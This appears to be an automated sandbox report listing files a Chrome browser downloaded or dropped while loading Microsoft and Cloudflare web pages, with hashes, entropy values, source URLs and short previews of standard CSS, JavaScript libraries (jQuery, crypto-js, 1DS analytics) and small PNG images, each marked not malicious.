                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (65301)
                                                  Category:downloaded
                                                  Size (bytes):369159
                                                  Entropy (8bit):5.074868514137742
                                                  Encrypted:false
                                                  SSDEEP:6144:ekeXumqfohEGukB3iZPyonENXt2ryNZtVr1T:MXupfohJ
                                                  MD5:BB9CD1B189207DC1AA01B5131F01D561
                                                  SHA1:61C7BCA1652D89B35FC0EBFBD224287D6EA84F4F
                                                  SHA-256:687A199F173483CBF2FB2F0AF7BCFEE48DB23799A1FA00330654057316305B43
                                                  SHA-512:CDA139BE361BD4E83099B97D67316A2F7D8539B302D235D32FCDD98D0054A488FC266C339BB34ADE50C2DF308CB50827EF7781C706FB53270437CC1FD4370A38
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdn.graph.office.net/prod/css/Moray/v2.20.0/main.min.css
                                                  Preview:@charset "UTF-8";/*!. * MWF (Moray) v2.20.0. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(../fonts/MWFFluentIcons.woff2) format("woff2"),url(../fonts/MWFFluentIcons.woff) format("woff"),url(../fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.wo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (47691)
                                                  Category:dropped
                                                  Size (bytes):47692
                                                  Entropy (8bit):5.401573598696506
                                                  Encrypted:false
                                                  SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                  MD5:B0B3774E70E752266B4CF190E6D95053
                                                  SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                  SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                  SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 56 x 87, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):61
                                                  Entropy (8bit):4.068159130770306
                                                  Encrypted:false
                                                  SSDEEP:3:yionv//thPl/IzIjlpBxl/k4E08up:6v/lhPOMjTB7Tp
                                                  MD5:C3E9ABEBD8C535B8DB9A61E5ABCDA1F1
                                                  SHA1:DA9A075B532D8B79D7B101A8B0A5E59B5CC729C1
                                                  SHA-256:C7516350FC5247A62AAA1E5594A96194226AED2B6E356CE4372E5D7800B4761E
                                                  SHA-512:7F71ED2371D52495C6ACC69DE846D5128B9EFFA73731593F5F0B3A8EB0563E93A01E1BA13D5B3552D5DC90CF3F43E5F7428F830E257833815A7B2E71D85EEFAC
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR...8...W......F......IDAT.....$.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65397)
                                                  Category:downloaded
                                                  Size (bytes):140189
                                                  Entropy (8bit):5.446339238570862
                                                  Encrypted:false
                                                  SSDEEP:3072:sX5OJxsBPpEXUBWz6Fs72aPPcdQ0TuTSpZOA:+5OJaBPp6+W2cr0STmZ7
                                                  MD5:1C4F61013DBC14EF47CF207DEC6DC4BC
                                                  SHA1:F02CCB53B268937893D82E3125A5F30CF40947FA
                                                  SHA-256:1745A25953EA2122472E06AA9C56924C6C1E8D465046B5A516191A9A1B3F9429
                                                  SHA-512:D3F6C85DDCCEA9C5000FF0F8DFE03CAE75E0C92D833A8AF10B28A03989D987F9F235763ABB463773D9B6012888E77F74595EEDAD4CA9461AA25C1039C61ED75B
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.2.12.min.js
                                                  Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.12. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,t=function(n){"use strict";var u="function",s="object",fe="undefined",f="prototype",l="hasOwnProperty",g=Object,v=g[f],y=g.assign,T=g.create,e=g.defineProperty,I=v[l],b=null;function C(e){e=!1===(e=void 0===e||e)?null:b;return e||((e=(e=(e=typeof globalThis!==fe?globalThis:e)||typeof self===fe?e:self)||typeof window===fe?e:window)||typeof global===fe||(e=global),b=e),e}function S(e){throw new TypeError(e)}function U(e){var t;return T?T(e):null==e?{}:((t=typeof e)!==s&&t!==u&&S("Object prototype may only be an Object:"+e),n[f]=e,new n);function n(){}}(C()||{}).Symbol,(C()||{}).Reflect;var N=y||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])v[l].call(t,r)&&(e[r]=t[r]);return e},w=function(e,t){return(w=g.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,t){e.__proto__=t}:function(e,t){for(var n in
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:dropped
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 1260 x 411, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):346174
                                                  Entropy (8bit):7.9882682310650885
                                                  Encrypted:false
                                                  SSDEEP:6144:mutr2GZf2IiJFFvFvsZOBDXSvePVDKV1inliMfN1Xvz7RzHR6dOVfAzYer0:ftwICNF/BDSeZmkc6nljR6cZETr0
                                                  MD5:E42F36DAA3DE781E2F02A23D450FA8D0
                                                  SHA1:5907522C0F9A3C828E9005164F32410E5ABBFAD7
                                                  SHA-256:E21CC348D41DD2BCF510C879C2AFA62E7D3A2E94AF07422D8D9115A07416C4C5
                                                  SHA-512:F2292DD7E32957E5A22873BB7D23E49A840EF3629029BBA3872E92537097F11B3467056783C11CB6D31586CD54EB48ABD08AA6C8AB1C8567BDCBB56C8EF39D7A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR.............wZ.[....pHYs.................sRGB.........gAMA......a...G.IDATx...k.,Kr&..Ff..}...@u.....v..#....?C....p.....`.w.%p....P..?(.L..........U....G...}.....'O..<....pw{.....~....'.._..7........t.G....Xn...q..t..{.G)..l=.E..M......h..'..Q.........C...m..M.X.YhY..8.0..Q.....uVd.6..5.9...G.9h...^...3^.z..C]..I...o.H#.G.;.tM.......Sy...}L.k....r.zw..n.>.E{.k..Z........n....FLZ4...:.sF'}..J.I...m.As.l..:...KOx..^......Z.\.s...j6^.-..%?,.c..*3w>.}..z.#.......R....l.L.lT.t..>....5.p...Y6U..^.~Q.;..^Q.#..YV.........{.U.C.......~+?...}..*....LoC.&..f6...~.... ....w*.5..Tw\t...n................?......N..._.t. ._.....w.X..P"..,...T......a..z..e..>...[.7..bi;.x.l.....17.h....|*(..Z..n..Y.....i..O...%i.....8.d.;..r.`n....l.y..<...vO...............^..+...L..m@..._.....v...4S.....].2...s..l....98."ix...Z...Y..*.u...l..`..[@.@..S..J(<....Z.Q...D?..2.n]....^.j..!......C;....a.K....Y./-..Q.....V...!.P..b.S...b..D..N...ss...5....h...q-.l..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (29004)
                                                  Category:downloaded
                                                  Size (bytes):29206
                                                  Entropy (8bit):5.501059907569595
                                                  Encrypted:false
                                                  SSDEEP:384:eR0+Q3D13T8BynBDyd56wT2bey6aShwBFz94EhEJkUabHWj/TfYBZvcQEwHdnvgU:XpXIJT2bed+BFzuDaij/TfGR1Cxb2
                                                  MD5:57C904512A0D4846547C39317C3CCDA8
                                                  SHA1:C9425673534A00EC7FF6A688C6673EDBF976F135
                                                  SHA-256:4A1450902E0E37F309F9338FA42BFFCD090CF499EAD18845627741F7868481B7
                                                  SHA-512:8ABED572751DEBEF6A36E2C9995CE885D7CC31EBDDE9B17E876E50460DC39DC0A9126AF481B87DE9C0A6065D28934B6EF259D6C6E1E891B57C1E181C2CC21645
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdn.graph.office.net/prod/Scripts/1ds-privacy-guard-js-3212/bundle/ms.privacyguard-3.2.12.min.js
                                                  Preview:/*!. * 1DS JS SDK Privacy Guard plugin, 3.2.12. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,n=function(e){"use strict";var k="function",U="object",a="undefined",r="prototype",V="hasOwnProperty",t=Object,B=t[r],n=(t.create,t.defineProperty),R=B[V],X=null;function G(e){e=!1===(e=void 0===e||e)?null:X;return e||((e=(e=(e=typeof globalThis!==a?globalThis:e)||typeof self===a?e:self)||typeof window===a?e:window)||typeof global===a||(e=global),X=e),e}function W(e){throw new TypeError(e)}(G()||{}).Symbol,(G()||{}).Reflect;var H=function(e,n){return(H=t.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,n){e.__proto__=n}:function(e,n){for(var t in n)n[V](t)&&(e[t]=n[t])}))(e,n)},i="undefined",z="constructor",g="prototype",K="function",j="_dynInstFuncs",Z="_isDynProxy",p="_dynClass",q="_dynInstChk",J=q,$="_dfOpts",Q="_unknown_",Y="__proto__",ee="_dyn"+Y,o="__dynProto$Gbl",ne="_dynInstProto",te="useBaseInst",re="setInstFuncs
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):61
                                                  Entropy (8bit):3.990210155325004
                                                  Encrypted:false
                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 1260 x 411, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):346174
                                                  Entropy (8bit):7.9882682310650885
                                                  Encrypted:false
                                                  SSDEEP:6144:mutr2GZf2IiJFFvFvsZOBDXSvePVDKV1inliMfN1Xvz7RzHR6dOVfAzYer0:ftwICNF/BDSeZmkc6nljR6cZETr0
                                                  MD5:E42F36DAA3DE781E2F02A23D450FA8D0
                                                  SHA1:5907522C0F9A3C828E9005164F32410E5ABBFAD7
                                                  SHA-256:E21CC348D41DD2BCF510C879C2AFA62E7D3A2E94AF07422D8D9115A07416C4C5
                                                  SHA-512:F2292DD7E32957E5A22873BB7D23E49A840EF3629029BBA3872E92537097F11B3467056783C11CB6D31586CD54EB48ABD08AA6C8AB1C8567BDCBB56C8EF39D7A
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdn.graph.office.net/prod/media/graph/HeroBanner_VP4.png?v={5/string}
                                                  Preview:.PNG........IHDR.............wZ.[....pHYs.................sRGB.........gAMA......a...G.IDATx...k.,Kr&..Ff..}...@u.....v..#....?C....p.....`.w.%p....P..?(.L..........U....G...}.....'O..<....pw{.....~....'.._..7........t.G....Xn...q..t..{.G)..l=.E..M......h..'..Q.........C...m..M.X.YhY..8.0..Q.....uVd.6..5.9...G.9h...^...3^.z..C]..I...o.H#.G.;.tM.......Sy...}L.k....r.zw..n.>.E{.k..Z........n....FLZ4...:.sF'}..J.I...m.As.l..:...KOx..^......Z.\.s...j6^.-..%?,.c..*3w>.}..z.#.......R....l.L.lT.t..>....5.p...Y6U..^.~Q.;..^Q.#..YV.........{.U.C.......~+?...}..*....LoC.&..f6...~.... ....w*.5..Tw\t...n................?......N..._.t. ._.....w.X..P"..,...T......a..z..e..>...[.7..bi;.x.l.....17.h....|*(..Z..n..Y.....i..O...%i.....8.d.;..r.`n....l.y..<...vO...............^..+...L..m@..._.....v...4S.....].2...s..l....98."ix...Z...Y..*.u...l..`..[@.@..S..J(<....Z.Q...D?..2.n]....^.j..!......C;....a.K....Y./-..Q.....V...!.P..b.S...b..D..N...ss...5....h...q-.l..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 56 x 87, 8-bit/color RGB, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):61
                                                  Entropy (8bit):4.068159130770306
                                                  Encrypted:false
                                                  SSDEEP:3:yionv//thPl/IzIjlpBxl/k4E08up:6v/lhPOMjTB7Tp
                                                  MD5:C3E9ABEBD8C535B8DB9A61E5ABCDA1F1
                                                  SHA1:DA9A075B532D8B79D7B101A8B0A5E59B5CC729C1
                                                  SHA-256:C7516350FC5247A62AAA1E5594A96194226AED2B6E356CE4372E5D7800B4761E
                                                  SHA-512:7F71ED2371D52495C6ACC69DE846D5128B9EFFA73731593F5F0B3A8EB0563E93A01E1BA13D5B3552D5DC90CF3F43E5F7428F830E257833815A7B2E71D85EEFAC
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ef3a85b7bfe0fa7/1733733287501/hCPFhaUF_Cr2Wlr
                                                  Preview:.PNG........IHDR...8...W......F......IDAT.....$.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):48316
                                                  Entropy (8bit):5.6346993394709
                                                  Encrypted:false
                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (38764)
                                                  Category:dropped
                                                  Size (bytes):159173
                                                  Entropy (8bit):5.3297142712650905
                                                  Encrypted:false
                                                  SSDEEP:3072:ZDziV+dwHl6/xvv8ij5frAMPWzlzU4wd2rw:xwq8dzU4w5
                                                  MD5:3F0E36351D1FAB460D9E7C4D595C4976
                                                  SHA1:43A8B2CF0CBB6B74979245B422BD2A72E71FA6E1
                                                  SHA-256:B255C13793B75CC91AE652E26F7BCC57A492CAF920A1CE3378F3144EBA49C1B9
                                                  SHA-512:624EFD83CD5A260452F3BE5F9887EC837821F86D85C7865EC4E12347635779BDB9B029098D5BF884690BA4C0C0E52451F753FE997E3E0C0699C17F3EB50AAB65
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*!. * MWF (Moray) v2.20.0. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).mwf={})}(this,(function(t){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function s(t){return t&&t.__esModule&&Object.prototype.hasOwnProperty.call(t,"default")?t.default:t}var i=function(t){return t&&t.Math==Math&&t},n=i("object"==typeof globalThis&&globalThis)||i("object"==typeof window&&window)||i("object"==typeof self&&self)||i("object"==typeof e&&e)||function(){return this}()||e||Function("return this")(),o={},l=function(t){try{return!!t()}catch(t){return!0}},r=!l((func
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (15260)
                                                  Category:downloaded
                                                  Size (bytes):15992
                                                  Entropy (8bit):4.944309042534047
                                                  Encrypted:false
                                                  SSDEEP:192:2s5MIT/ZOiJDxrSdI7eM96uXPTG/lhCTQICN:WIT/ZOWZl6Q+PCTQH
                                                  MD5:1F352874569E9B9752CB80796E91DBED
                                                  SHA1:9E7DD2E7001E38B56C5690C411100BF7F6745CEB
                                                  SHA-256:37C50B2623E86E3D13EC9EC6C224F5D1869A33BC51E2B64473C0771C0AA59B92
                                                  SHA-512:CC220F67F753C8071987A1BA10972CAF63341FA4E625685DB0700AE72C6BD2BF3295F8F8C294F676BB13707E6990416AB609866B0168320B6AEE1DF0BEA17AC4
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://developer.microsoft.com/en-us/office/content/build/css/icons.css?ver=20241209072755
                                                  Preview:..hidden{display:none !important;visibility:hidden !important}@font-face{font-family:"DevPortal";src:url("./devportal.eot");src:url("./devportal.eot?#iefix") format("embedded-opentype"),url("./devportal.woff") format("woff"),url("./devportal.ttf") format("truetype"),url("./devportal.svg?#devportal") format("svg");font-weight:normal;font-style:normal;font-display:block}.win-icon{font-family:"DevPortal" !important;display:inline-block;speak:never;font-style:normal;font-weight:normal;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.win-icon-AddIn1:before{content:"."}.win-icon-2FA:before{content:"."}.win-icon-Accessibility:before{content:"."}.win-icon-AADLogo:before{content:"."}.win-icon-AccessLogo:before{content:"."}.win-icon-ActionableMail:before{content:"."}.win-icon-Add:before{content:"."}.win-icon-AddAgent:before{content:"."}.win-icon-AddIn:before{content:"."}.win-icon-AltText:before{content
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdn.graph.office.net/prod/vendor/node_modules/jquery/v3.6.0/jquery-3.6.0.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65397)
                                                  Category:dropped
                                                  Size (bytes):140189
                                                  Entropy (8bit):5.446339238570862
                                                  Encrypted:false
                                                  SSDEEP:3072:sX5OJxsBPpEXUBWz6Fs72aPPcdQ0TuTSpZOA:+5OJaBPp6+W2cr0STmZ7
                                                  MD5:1C4F61013DBC14EF47CF207DEC6DC4BC
                                                  SHA1:F02CCB53B268937893D82E3125A5F30CF40947FA
                                                  SHA-256:1745A25953EA2122472E06AA9C56924C6C1E8D465046B5A516191A9A1B3F9429
                                                  SHA-512:D3F6C85DDCCEA9C5000FF0F8DFE03CAE75E0C92D833A8AF10B28A03989D987F9F235763ABB463773D9B6012888E77F74595EEDAD4CA9461AA25C1039C61ED75B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.12. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,t=function(n){"use strict";var u="function",s="object",fe="undefined",f="prototype",l="hasOwnProperty",g=Object,v=g[f],y=g.assign,T=g.create,e=g.defineProperty,I=v[l],b=null;function C(e){e=!1===(e=void 0===e||e)?null:b;return e||((e=(e=(e=typeof globalThis!==fe?globalThis:e)||typeof self===fe?e:self)||typeof window===fe?e:window)||typeof global===fe||(e=global),b=e),e}function S(e){throw new TypeError(e)}function U(e){var t;return T?T(e):null==e?{}:((t=typeof e)!==s&&t!==u&&S("Object prototype may only be an Object:"+e),n[f]=e,new n);function n(){}}(C()||{}).Symbol,(C()||{}).Reflect;var N=y||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])v[l].call(t,r)&&(e[r]=t[r]);return e},w=function(e,t){return(w=g.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,t){e.__proto__=t}:function(e,t){for(var n in
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):61
                                                  Entropy (8bit):3.990210155325004
                                                  Encrypted:false
                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (47691)
                                                  Category:downloaded
                                                  Size (bytes):47692
                                                  Entropy (8bit):5.401573598696506
                                                  Encrypted:false
                                                  SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                  MD5:B0B3774E70E752266B4CF190E6D95053
                                                  SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                  SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                  SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js
